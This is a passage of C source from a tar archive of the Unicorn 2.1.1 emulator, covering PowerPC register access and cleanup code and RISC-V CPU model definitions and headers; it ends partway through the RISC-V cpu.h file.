* It appears that: * - 32-bit implementations supports PR=1 and EE/DR/IR=0 and MacOS * exploits it. * - 64-bit embedded implementations do not need any operation to be * performed when PR is set. */ if (is_book3s_arch2x(env) && ((value >> MSR_PR) & 1)) { value |= (1 << MSR_EE) | (1 << MSR_DR) | (1 << MSR_IR); } env->msr = value; hreg_compute_hflags(env); // if (unlikely(msr_pow == 1)) { // if (!env->pending_interrupts && (*env->check_pow)(env)) { // cs->halted = 1; // excp = EXCP_HALTED; // } // } return 0; } static void ppc_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUPPCState *)uc->cpu->env_ptr)->nip = address; } static uint64_t ppc_get_pc(struct uc_struct *uc) { return ((CPUPPCState *)uc->cpu->env_ptr)->nip; } void ppc_cpu_instance_finalize(CPUState *obj); void ppc_cpu_unrealize(CPUState *dev); static void ppc_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; PowerPCCPU *cpu = (PowerPCCPU *)tcg_ctx->uc->cpu; CPUPPCState *env = &cpu->env; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } for (i = 0; i < 32; i++) { g_free(tcg_ctx->cpu_gpr[i]); } // g_free(tcg_ctx->cpu_PC); g_free(tcg_ctx->btarget); g_free(tcg_ctx->bcond); g_free(tcg_ctx->cpu_dspctrl); // g_free(tcg_ctx->tb_ctx.tbs); if (env->nb_tlb != 0) { switch (env->tlb_type) { case TLB_6XX: g_free(env->tlb.tlb6); break; case TLB_EMB: g_free(env->tlb.tlbe); break; case TLB_MAS: g_free(env->tlb.tlbm); break; } } ppc_cpu_instance_finalize(tcg_ctx->uc->cpu); ppc_cpu_unrealize(tcg_ctx->uc->cpu); } static void reg_reset(struct uc_struct *uc) { CPUArchState *env; env = uc->cpu->env_ptr; memset(env->gpr, 0, sizeof(env->gpr)); env->nip = 0; } // http://www.csit-sun.pub.ro/~cpop/Documentatie_SMP/Motorola_PowerPC/PowerPc/GenInfo/pemch2.pdf DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUPPCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_PPC_REG_0 && regid <= UC_PPC_REG_31) { CHECK_REG_TYPE(ppcreg_t); *(ppcreg_t *)value = env->gpr[regid - UC_PPC_REG_0]; } else if (regid >= UC_PPC_REG_FPR0 && regid <= UC_PPC_REG_FPR31) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->vsr[regid - UC_PPC_REG_FPR0].VsrD(0); } else if (regid >= UC_PPC_REG_CR0 && regid <= UC_PPC_REG_CR7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->crf[regid - UC_PPC_REG_CR0]; } else { switch (regid) { default: break; case UC_PPC_REG_PC: CHECK_REG_TYPE(ppcreg_t); *(ppcreg_t *)value = env->nip; break; case UC_PPC_REG_CR: { CHECK_REG_TYPE(uint32_t); int i; uint32_t val = 0; for (i = 0; i < 8; i++) { val <<= 4; val |= env->crf[i]; } *(uint32_t *)value = val; break; } case UC_PPC_REG_LR: CHECK_REG_TYPE(ppcreg_t); *(ppcreg_t *)value = env->lr; break; case UC_PPC_REG_CTR: CHECK_REG_TYPE(ppcreg_t); *(ppcreg_t *)value = env->ctr; break; case UC_PPC_REG_MSR: CHECK_REG_TYPE(ppcreg_t); *(ppcreg_t *)value = env->msr; break; case UC_PPC_REG_XER: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->xer; break; case UC_PPC_REG_FPSCR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->fpscr; break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUPPCState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_PPC_REG_0 && regid <= UC_PPC_REG_31) { CHECK_REG_TYPE(ppcreg_t); env->gpr[regid - UC_PPC_REG_0] = 
*(ppcreg_t *)value; } else if (regid >= UC_PPC_REG_FPR0 && regid <= UC_PPC_REG_FPR31) { CHECK_REG_TYPE(uint64_t); env->vsr[regid - UC_PPC_REG_FPR0].VsrD(0) = *(uint64_t *)value; } else if (regid >= UC_PPC_REG_CR0 && regid <= UC_PPC_REG_CR7) { CHECK_REG_TYPE(uint32_t); env->crf[regid - UC_PPC_REG_CR0] = (*(uint32_t *)value) & 0b1111; } else { switch (regid) { default: break; case UC_PPC_REG_PC: CHECK_REG_TYPE(ppcreg_t); env->nip = *(ppcreg_t *)value; *setpc = 1; break; case UC_PPC_REG_CR: { CHECK_REG_TYPE(uint32_t); int i; uint32_t val = *(uint32_t *)value; for (i = 7; i >= 0; i--) { env->crf[i] = val & 0b1111; val >>= 4; } break; } case UC_PPC_REG_LR: CHECK_REG_TYPE(ppcreg_t); env->lr = *(ppcreg_t *)value; break; case UC_PPC_REG_CTR: CHECK_REG_TYPE(ppcreg_t); env->ctr = *(ppcreg_t *)value; break; case UC_PPC_REG_MSR: CHECK_REG_TYPE(ppcreg_t); uc_ppc_store_msr(env, *(ppcreg_t *)value, 0); break; case UC_PPC_REG_XER: CHECK_REG_TYPE(uint32_t); env->xer = *(uint32_t *)value; break; case UC_PPC_REG_FPSCR: CHECK_REG_TYPE(uint32_t); store_fpscr(env, *(uint32_t *)value, 0xffffffff); break; } } return ret; } PowerPCCPU *cpu_ppc_init(struct uc_struct *uc); static int ppc_cpus_init(struct uc_struct *uc, const char *cpu_model) { PowerPCCPU *cpu; cpu = cpu_ppc_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->release = ppc_release; uc->set_pc = ppc_set_pc; uc->get_pc = ppc_get_pc; uc->cpus_init = ppc_cpus_init; uc->cpu_context_size = offsetof(CPUPPCState, uc); uc_common_init(uc); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/unicorn.h�������������������������������������������������������������0000664�0000000�0000000�00000001362�14675241067�0020053�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ #ifndef UC_QEMU_TARGET_PPC_H #define UC_QEMU_TARGET_PPC_H // functions to read & write registers uc_err reg_read_ppc(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_ppc64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_ppc(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_ppc64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_ppc(struct uc_struct *uc); void uc_init_ppc64(struct uc_struct *uc); #endif 
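/*
 * Usage sketch (editor's addition, not part of the original header): the
 * register accessors declared above are reached through Unicorn's public
 * API rather than called directly. A minimal big-endian PPC32 run could
 * look like the following; error checking is omitted, and the instruction
 * encoding 0x7C611214 for "add r3, r1, r2" is an assumption to verify
 * against an assembler.
 *
 *     #include <unicorn/unicorn.h>
 *
 *     uc_engine *uc;
 *     uint32_t r1 = 5, r2 = 7, r3 = 0;
 *     const char code[] = "\x7c\x61\x12\x14";              // add r3, r1, r2
 *
 *     uc_open(UC_ARCH_PPC, UC_MODE_PPC32 | UC_MODE_BIG_ENDIAN, &uc);
 *     uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL);         // one 4 KiB page
 *     uc_mem_write(uc, 0x1000, code, sizeof(code) - 1);
 *     uc_reg_write(uc, UC_PPC_REG_1, &r1);                 // routed to reg_write
 *     uc_reg_write(uc, UC_PPC_REG_2, &r2);
 *     uc_emu_start(uc, 0x1000, 0x1000 + sizeof(code) - 1, 0, 0);
 *     uc_reg_read(uc, UC_PPC_REG_3, &r3);                  // r3 == 12
 *     uc_close(uc);
 *
 * In 32-bit mode the GPR accessors operate on 32-bit ppcreg_t values, so
 * the variables passed to uc_reg_read/uc_reg_write must be 32 bits wide.
 */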
unicorn-2.1.1/qemu/target/riscv/
unicorn-2.1.1/qemu/target/riscv/README
code under riscv32/ is from riscv32-softmmu/target/riscv/*.inc.c
code under riscv64/ is from riscv64-softmmu/target/riscv/*.inc.c
WARNING: these files are autogenerated by scripts/decodetree.py; DO NOT modify them.
unicorn-2.1.1/qemu/target/riscv/cpu-param.h
/*
 * RISC-V cpu parameters for qemu.
 *
 * Copyright (c) 2017-2018 SiFive, Inc.
 * SPDX-License-Identifier: GPL-2.0+
 */

#ifndef RISCV_CPU_PARAM_H
#define RISCV_CPU_PARAM_H 1

#if defined(TARGET_RISCV64)
# define TARGET_LONG_BITS 64
# define TARGET_PHYS_ADDR_SPACE_BITS 56 /* 44-bit PPN */
# define TARGET_VIRT_ADDR_SPACE_BITS 48 /* sv48 */
#elif defined(TARGET_RISCV32)
# define TARGET_LONG_BITS 32
# define TARGET_PHYS_ADDR_SPACE_BITS 34 /* 22-bit PPN */
# define TARGET_VIRT_ADDR_SPACE_BITS 32 /* sv32 */
#endif

#define TARGET_PAGE_BITS 12 /* 4 KiB Pages */
#define NB_MMU_MODES 4

#endif
unicorn-2.1.1/qemu/target/riscv/cpu.c
/*
 * QEMU RISC-V CPU
 *
 * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu
 * Copyright (c) 2017-2018 SiFive, Inc.
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms and conditions of the GNU General Public License,
 * version 2 or later, as published by the Free Software Foundation.
 *
 * This program is distributed in the hope it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
 * more details.
 *
 * You should have received a copy of the GNU General Public License along with
 * this program. If not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "qemu/ctype.h" #include "qemu/log.h" #include "cpu.h" #include "exec/exec-all.h" #include "fpu/softfloat-helpers.h" #include <uc_priv.h> /* RISC-V CPU definitions */ // static const char riscv_exts[26] = "IEMAFDQCLBJTPVNSUHKORWXYZG"; const char * const riscv_int_regnames[] = { "x0/zero", "x1/ra", "x2/sp", "x3/gp", "x4/tp", "x5/t0", "x6/t1", "x7/t2", "x8/s0", "x9/s1", "x10/a0", "x11/a1", "x12/a2", "x13/a3", "x14/a4", "x15/a5", "x16/a6", "x17/a7", "x18/s2", "x19/s3", "x20/s4", "x21/s5", "x22/s6", "x23/s7", "x24/s8", "x25/s9", "x26/s10", "x27/s11", "x28/t3", "x29/t4", "x30/t5", "x31/t6" }; const char * const riscv_fpr_regnames[] = { "f0/ft0", "f1/ft1", "f2/ft2", "f3/ft3", "f4/ft4", "f5/ft5", "f6/ft6", "f7/ft7", "f8/fs0", "f9/fs1", "f10/fa0", "f11/fa1", "f12/fa2", "f13/fa3", "f14/fa4", "f15/fa5", "f16/fa6", "f17/fa7", "f18/fs2", "f19/fs3", "f20/fs4", "f21/fs5", "f22/fs6", "f23/fs7", "f24/fs8", "f25/fs9", "f26/fs10", "f27/fs11", "f28/ft8", "f29/ft9", "f30/ft10", "f31/ft11" }; static void set_misa(CPURISCVState *env, target_ulong misa) { env->misa_mask = env->misa = misa; } static void set_priv_version(CPURISCVState *env, int priv_ver) { env->priv_ver = priv_ver; } static void set_feature(CPURISCVState *env, int feature) { env->features |= (1ULL << feature); } static void set_resetvec(CPURISCVState *env, int resetvec) { env->resetvec = resetvec; } static void riscv_any_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; set_misa(env, RVXLEN | RVI | RVM | RVA | RVF | RVD | RVC | RVU); set_priv_version(env, PRIV_VERSION_1_11_0); set_resetvec(env, DEFAULT_RSTVEC); } #if defined(TARGET_RISCV32) // rv32 static void riscv_base32_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; /* We set this in the realise function */ set_misa(env, 0); } // sifive-u34 static void rv32gcsu_priv1_10_0_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; set_misa(env, RV32 | RVI | RVM | RVA | RVF | RVD | RVC | RVS | RVU); set_priv_version(env, PRIV_VERSION_1_10_0); set_resetvec(env, DEFAULT_RSTVEC); set_feature(env, RISCV_FEATURE_MMU); set_feature(env, RISCV_FEATURE_PMP); } // sifive-e31 static void rv32imacu_nommu_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; set_misa(env, RV32 | RVI | RVM | RVA | RVC | RVU); set_priv_version(env, PRIV_VERSION_1_10_0); set_resetvec(env, DEFAULT_RSTVEC); set_feature(env, RISCV_FEATURE_PMP); } #elif defined(TARGET_RISCV64) // rv64 static void riscv_base64_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; /* We set this in the realise function */ set_misa(env, 0); } // sifive-u54 static void rv64gcsu_priv1_10_0_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; set_misa(env, RV64 | RVI | RVM | RVA | RVF | RVD | RVC | RVS | RVU); set_priv_version(env, PRIV_VERSION_1_10_0); set_resetvec(env, DEFAULT_RSTVEC); set_feature(env, RISCV_FEATURE_MMU); set_feature(env, RISCV_FEATURE_PMP); } // sifive-e51 static void rv64imacu_nommu_cpu_init(CPUState *obj) { CPURISCVState *env = &RISCV_CPU(obj)->env; set_misa(env, RV64 | RVI | RVM | RVA | RVC | RVU); set_priv_version(env, PRIV_VERSION_1_10_0); set_resetvec(env, DEFAULT_RSTVEC); set_feature(env, RISCV_FEATURE_PMP); } #endif static void riscv_cpu_set_pc(CPUState *cs, vaddr value) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; env->pc = value; } static void riscv_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; 
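    /* QEMU's synchronize_from_tb hook: when execution stops inside a
     * translation block, recover the architectural PC from the TB. */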
env->pc = tb->pc; } static bool riscv_cpu_has_work(CPUState *cs) { RISCVCPU *cpu = RISCV_CPU(cs); CPURISCVState *env = &cpu->env; /* * Definition of the WFI instruction requires it to ignore the privilege * mode and delegation registers, but respect individual enables */ return (env->mip & env->mie) != 0; } void restore_state_to_opc(CPURISCVState *env, TranslationBlock *tb, target_ulong *data) { env->pc = data[0]; } static void riscv_cpu_reset(CPUState *dev) { CPUState *cs = CPU(dev); RISCVCPU *cpu = RISCV_CPU(cs); RISCVCPUClass *mcc = RISCV_CPU_GET_CLASS(cpu); CPURISCVState *env = &cpu->env; mcc->parent_reset(cs); env->priv = PRV_M; env->mstatus &= ~(MSTATUS_MIE | MSTATUS_MPRV); env->mcause = 0; env->pc = env->resetvec; cs->exception_index = EXCP_NONE; env->load_res = -1; set_default_nan_mode(1, &env->fp_status); } static void riscv_cpu_realize(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); RISCVCPU *cpu = RISCV_CPU(dev); CPURISCVState *env = &cpu->env; int priv_version = PRIV_VERSION_1_11_0; target_ulong target_misa = 0; cpu_exec_realizefn(cs); if (cpu->cfg.priv_spec) { if (!g_strcmp0(cpu->cfg.priv_spec, "v1.11.0")) { priv_version = PRIV_VERSION_1_11_0; } else if (!g_strcmp0(cpu->cfg.priv_spec, "v1.10.0")) { priv_version = PRIV_VERSION_1_10_0; } else if (!g_strcmp0(cpu->cfg.priv_spec, "v1.9.1")) { priv_version = PRIV_VERSION_1_09_1; } else { // error_setg(errp, "Unsupported privilege spec version '%s'", cpu->cfg.priv_spec); return; } } set_priv_version(env, priv_version); set_resetvec(env, DEFAULT_RSTVEC); if (cpu->cfg.mmu) { set_feature(env, RISCV_FEATURE_MMU); } if (cpu->cfg.pmp) { set_feature(env, RISCV_FEATURE_PMP); } /* If misa isn't set (rv32 and rv64 machines) set it here */ if (!env->misa) { /* Do some ISA extension error checking */ if (cpu->cfg.ext_i && cpu->cfg.ext_e) { //error_setg(errp, "I and E extensions are incompatible"); return; } if (!cpu->cfg.ext_i && !cpu->cfg.ext_e) { // error_setg(errp, "Either I or E extension must be set"); return; } if (cpu->cfg.ext_g && !(cpu->cfg.ext_i & cpu->cfg.ext_m & cpu->cfg.ext_a & cpu->cfg.ext_f & cpu->cfg.ext_d)) { // warn_report("Setting G will also set IMAFD"); cpu->cfg.ext_i = true; cpu->cfg.ext_m = true; cpu->cfg.ext_a = true; cpu->cfg.ext_f = true; cpu->cfg.ext_d = true; } /* Set the ISA extensions, checks should have happened above */ if (cpu->cfg.ext_i) { target_misa |= RVI; } if (cpu->cfg.ext_e) { target_misa |= RVE; } if (cpu->cfg.ext_m) { target_misa |= RVM; } if (cpu->cfg.ext_a) { target_misa |= RVA; } if (cpu->cfg.ext_f) { target_misa |= RVF; } if (cpu->cfg.ext_d) { target_misa |= RVD; } if (cpu->cfg.ext_c) { target_misa |= RVC; } if (cpu->cfg.ext_s) { target_misa |= RVS; } if (cpu->cfg.ext_u) { target_misa |= RVU; } if (cpu->cfg.ext_h) { target_misa |= RVH; } set_misa(env, RVXLEN | target_misa); } cpu_reset(cs); } static void riscv_cpu_init(struct uc_struct *uc, CPUState *obj) { RISCVCPU *cpu = RISCV_CPU(obj); CPURISCVState *env = &cpu->env; // unicorn env->uc = uc; cpu_set_cpustate_pointers(cpu); } static void riscv_cpu_class_init(struct uc_struct *uc, CPUClass *c, void *data) { RISCVCPUClass *mcc = RISCV_CPU_CLASS(c); CPUClass *cc = CPU_CLASS(c); mcc->parent_reset = cc->reset; cc->reset = riscv_cpu_reset; cc->has_work = riscv_cpu_has_work; cc->do_interrupt = riscv_cpu_do_interrupt; cc->cpu_exec_interrupt = riscv_cpu_exec_interrupt; cc->set_pc = riscv_cpu_set_pc; cc->synchronize_from_tb = riscv_cpu_synchronize_from_tb; cc->do_unaligned_access = riscv_cpu_do_unaligned_access; cc->tcg_initialize = 
        riscv_translate_init;
    cc->tlb_fill_cpu = riscv_cpu_tlb_fill;
}

typedef struct CPUModelInfo {
    const char *name;
    void (*initfn)(CPUState *obj);
} CPUModelInfo;

static const CPUModelInfo cpu_models[] = {
    {TYPE_RISCV_CPU_ANY, riscv_any_cpu_init},
#ifdef TARGET_RISCV32
    {TYPE_RISCV_CPU_BASE32, riscv_base32_cpu_init},
    {TYPE_RISCV_CPU_SIFIVE_E31, rv32imacu_nommu_cpu_init},
    {TYPE_RISCV_CPU_SIFIVE_U34, rv32gcsu_priv1_10_0_cpu_init},
#endif
#ifdef TARGET_RISCV64
    {TYPE_RISCV_CPU_BASE64, riscv_base64_cpu_init},
    {TYPE_RISCV_CPU_SIFIVE_E51, rv64imacu_nommu_cpu_init},
    {TYPE_RISCV_CPU_SIFIVE_U54, rv64gcsu_priv1_10_0_cpu_init},
#endif
};

RISCVCPU *cpu_riscv_init(struct uc_struct *uc)
{
    RISCVCPU *cpu;
    CPUState *cs;
    CPUClass *cc;

    cpu = calloc(1, sizeof(*cpu));
    if (cpu == NULL) {
        return NULL;
    }

#ifdef TARGET_RISCV32
    if (uc->cpu_model == INT_MAX) {
        uc->cpu_model = UC_CPU_RISCV32_SIFIVE_U34;
    }
#else /* TARGET_RISCV64 */
    if (uc->cpu_model == INT_MAX) {
        uc->cpu_model = UC_CPU_RISCV64_SIFIVE_U54;
    }
#endif

    if (uc->cpu_model >= ARRAY_SIZE(cpu_models)) {
        free(cpu);
        return NULL;
    }

    cs = (CPUState *)cpu;
    cc = (CPUClass *)&cpu->cc;
    cs->cc = cc;
    cs->uc = uc;
    uc->cpu = (CPUState *)cpu;

    /* init CPUClass */
    cpu_class_init(uc, cc);
    /* init RISCVCPUClass */
    riscv_cpu_class_init(uc, cc, NULL);
    /* init device properties */
    cpu->cfg.ext_i = true;
    cpu->cfg.ext_e = false;
    cpu->cfg.ext_g = true;
    cpu->cfg.ext_m = true;
    cpu->cfg.ext_a = true;
    cpu->cfg.ext_f = true;
    cpu->cfg.ext_d = true;
    cpu->cfg.ext_c = true;
    cpu->cfg.ext_s = true;
    cpu->cfg.ext_u = true;
    cpu->cfg.ext_h = false;
    cpu->cfg.ext_counters = true;
    cpu->cfg.ext_ifencei = true;
    cpu->cfg.ext_icsr = true;
    cpu->cfg.priv_spec = "v1.11.0";
    cpu->cfg.mmu = true;
    cpu->cfg.pmp = true;
    /* init CPUState */
    cpu_common_initfn(uc, cs);
    /* init CPU */
    riscv_cpu_init(uc, cs);
    /* init specific CPU model */
    cpu_models[uc->cpu_model].initfn(cs);
    /* realize CPU */
    riscv_cpu_realize(uc, cs);

    // init address space
    cpu_address_space_init(cs, 0, cs->memory);

    qemu_init_vcpu(cs);

    return cpu;
}
unicorn-2.1.1/qemu/target/riscv/cpu.h
/*
 * QEMU RISC-V CPU
 *
 * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu
 * Copyright (c) 2017-2018 SiFive, Inc.
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms and conditions of the GNU General Public License,
 * version 2 or later, as published by the Free Software Foundation.
 *
 * This program is distributed in the hope it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #ifndef RISCV_CPU_H #define RISCV_CPU_H #include "hw/core/cpu.h" #include "exec/cpu-defs.h" #include "fpu/softfloat-types.h" typedef struct TCGContext TCGContext; #define TYPE_RISCV_CPU "riscv-cpu" #define RISCV_CPU_TYPE_SUFFIX "-" TYPE_RISCV_CPU #define RISCV_CPU_TYPE_NAME(name) (name RISCV_CPU_TYPE_SUFFIX) #define CPU_RESOLVING_TYPE TYPE_RISCV_CPU #define TYPE_RISCV_CPU_ANY RISCV_CPU_TYPE_NAME("any") #define TYPE_RISCV_CPU_BASE32 RISCV_CPU_TYPE_NAME("rv32") #define TYPE_RISCV_CPU_BASE64 RISCV_CPU_TYPE_NAME("rv64") #define TYPE_RISCV_CPU_SIFIVE_E31 RISCV_CPU_TYPE_NAME("sifive-e31") #define TYPE_RISCV_CPU_SIFIVE_E51 RISCV_CPU_TYPE_NAME("sifive-e51") #define TYPE_RISCV_CPU_SIFIVE_U34 RISCV_CPU_TYPE_NAME("sifive-u34") #define TYPE_RISCV_CPU_SIFIVE_U54 RISCV_CPU_TYPE_NAME("sifive-u54") #define RV32 ((target_ulong)1 << (TARGET_LONG_BITS - 2)) #define RV64 ((target_ulong)2 << (TARGET_LONG_BITS - 2)) #if defined(TARGET_RISCV32) #define RVXLEN RV32 #elif defined(TARGET_RISCV64) #define RVXLEN RV64 #endif #define RV(x) ((target_ulong)1 << (x - 'A')) #define RVI RV('I') #define RVE RV('E') /* E and I are mutually exclusive */ #define RVM RV('M') #define RVA RV('A') #define RVF RV('F') #define RVD RV('D') #define RVC RV('C') #define RVS RV('S') #define RVU RV('U') #define RVH RV('H') /* S extension denotes that Supervisor mode exists, however it is possible to have a core that support S mode but does not have an MMU and there is currently no bit in misa to indicate whether an MMU exists or not so a cpu features bitfield is required, likewise for optional PMP support */ enum { RISCV_FEATURE_MMU, RISCV_FEATURE_PMP, RISCV_FEATURE_MISA }; #define PRIV_VERSION_1_09_1 0x00010901 #define PRIV_VERSION_1_10_0 0x00011000 #define PRIV_VERSION_1_11_0 0x00011100 #define TRANSLATE_PMP_FAIL 2 #define TRANSLATE_FAIL 1 #define TRANSLATE_SUCCESS 0 #define MMU_USER_IDX 3 #define MAX_RISCV_PMPS (16) typedef struct CPURISCVState CPURISCVState; #include "pmp.h" struct CPURISCVState { target_ulong gpr[32]; uint64_t fpr[32]; /* assume both F and D extensions */ target_ulong pc; target_ulong load_res; target_ulong load_val; target_ulong frm; target_ulong badaddr; target_ulong guest_phys_fault_addr; target_ulong priv_ver; target_ulong misa; target_ulong misa_mask; uint32_t features; target_ulong priv; /* This contains QEMU specific information about the virt state. 
*/ target_ulong virt; target_ulong resetvec; target_ulong mhartid; target_ulong mstatus; target_ulong mip; #ifdef TARGET_RISCV32 target_ulong mstatush; #endif uint32_t miclaim; target_ulong mie; target_ulong mideleg; target_ulong sptbr; /* until: priv-1.9.1 */ target_ulong satp; /* since: priv-1.10.0 */ target_ulong sbadaddr; target_ulong mbadaddr; target_ulong medeleg; target_ulong stvec; target_ulong sepc; target_ulong scause; target_ulong mtvec; target_ulong mepc; target_ulong mcause; target_ulong mtval; /* since: priv-1.10.0 */ /* Hypervisor CSRs */ target_ulong hstatus; target_ulong hedeleg; target_ulong hideleg; target_ulong hcounteren; target_ulong htval; target_ulong htinst; target_ulong hgatp; uint64_t htimedelta; /* Virtual CSRs */ target_ulong vsstatus; target_ulong vstvec; target_ulong vsscratch; target_ulong vsepc; target_ulong vscause; target_ulong vstval; target_ulong vsatp; #ifdef TARGET_RISCV32 target_ulong vsstatush; #endif target_ulong mtval2; target_ulong mtinst; /* HS Backup CSRs */ target_ulong stvec_hs; target_ulong sscratch_hs; target_ulong sepc_hs; target_ulong scause_hs; target_ulong stval_hs; target_ulong satp_hs; target_ulong mstatus_hs; #ifdef TARGET_RISCV32 target_ulong mstatush_hs; #endif target_ulong scounteren; target_ulong mcounteren; target_ulong sscratch; target_ulong mscratch; /* temporary htif regs */ uint64_t mfromhost; uint64_t mtohost; uint64_t timecmp; /* physical memory protection */ pmp_table_t pmp_state; /* machine specific rdtime callback */ uint64_t (*rdtime_fn)(void); /* True if in debugger mode. */ bool debugger; float_status fp_status; /* Fields from here on are preserved across CPU reset. */ QEMUTimer *timer; /* Internal timer */ // Unicorn engine struct uc_struct *uc; }; /** * RISCVCPUClass: * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * * A RISCV CPU model. */ typedef struct RISCVCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ void (*parent_reset)(CPUState *cpu); } RISCVCPUClass; /** * RISCVCPU: * @env: #CPURISCVState * * A RISCV CPU. 
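 * Bundles the common CPUState, the architectural state in @env, and the
 * ISA/feature configuration flags consumed by riscv_cpu_realize().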
*/ typedef struct RISCVCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPURISCVState env; /* Configuration Settings */ struct { bool ext_i; bool ext_e; bool ext_g; bool ext_m; bool ext_a; bool ext_f; bool ext_d; bool ext_c; bool ext_s; bool ext_u; bool ext_h; bool ext_counters; bool ext_ifencei; bool ext_icsr; char *priv_spec; char *user_spec; bool mmu; bool pmp; } cfg; struct RISCVCPUClass cc; } RISCVCPU; #define RISCV_CPU(obj) ((RISCVCPU *)obj) #define RISCV_CPU_CLASS(klass) ((RISCVCPUClass *)klass) #define RISCV_CPU_GET_CLASS(obj) (&((RISCVCPU *)obj)->cc) static inline int riscv_has_ext(CPURISCVState *env, target_ulong ext) { return (env->misa & ext) != 0; } static inline bool riscv_feature(CPURISCVState *env, int feature) { return env->features & (1ULL << feature); } #include "cpu_user.h" #include "cpu_bits.h" extern const char * const riscv_int_regnames[]; extern const char * const riscv_fpr_regnames[]; extern const char * const riscv_excp_names[]; extern const char * const riscv_intr_names[]; void riscv_cpu_do_interrupt(CPUState *cpu); int riscv_cpu_gdb_read_register(CPUState *cpu, GByteArray *buf, int reg); int riscv_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); bool riscv_cpu_exec_interrupt(CPUState *cs, int interrupt_request); bool riscv_cpu_fp_enabled(CPURISCVState *env); bool riscv_cpu_virt_enabled(CPURISCVState *env); void riscv_cpu_set_virt_enabled(CPURISCVState *env, bool enable); bool riscv_cpu_force_hs_excep_enabled(CPURISCVState *env); void riscv_cpu_set_force_hs_excep(CPURISCVState *env, bool enable); int riscv_cpu_mmu_index(CPURISCVState *env, bool ifetch); hwaddr riscv_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void riscv_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); bool riscv_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); void riscv_cpu_do_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr); #define cpu_mmu_index riscv_cpu_mmu_index void riscv_cpu_swap_hypervisor_regs(CPURISCVState *env); int riscv_cpu_claim_interrupts(RISCVCPU *cpu, uint32_t interrupts); uint32_t riscv_cpu_update_mip(RISCVCPU *cpu, uint32_t mask, uint32_t value); #define BOOL_TO_MASK(x) (-!!(x)) /* helper for riscv_cpu_update_mip value */ void riscv_cpu_set_rdtime_fn(CPURISCVState *env, uint64_t (*fn)(void)); void riscv_cpu_set_mode(CPURISCVState *env, target_ulong newpriv); void riscv_translate_init(struct uc_struct *uc); void QEMU_NORETURN riscv_raise_exception(CPURISCVState *env, uint32_t exception, uintptr_t pc); target_ulong riscv_cpu_get_fflags(CPURISCVState *env); void riscv_cpu_set_fflags(CPURISCVState *env, target_ulong); #define TB_FLAGS_MMU_MASK 3 #define TB_FLAGS_MSTATUS_FS MSTATUS_FS static inline void cpu_get_tb_cpu_state(CPURISCVState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *pc = env->pc; *cs_base = 0; *flags = 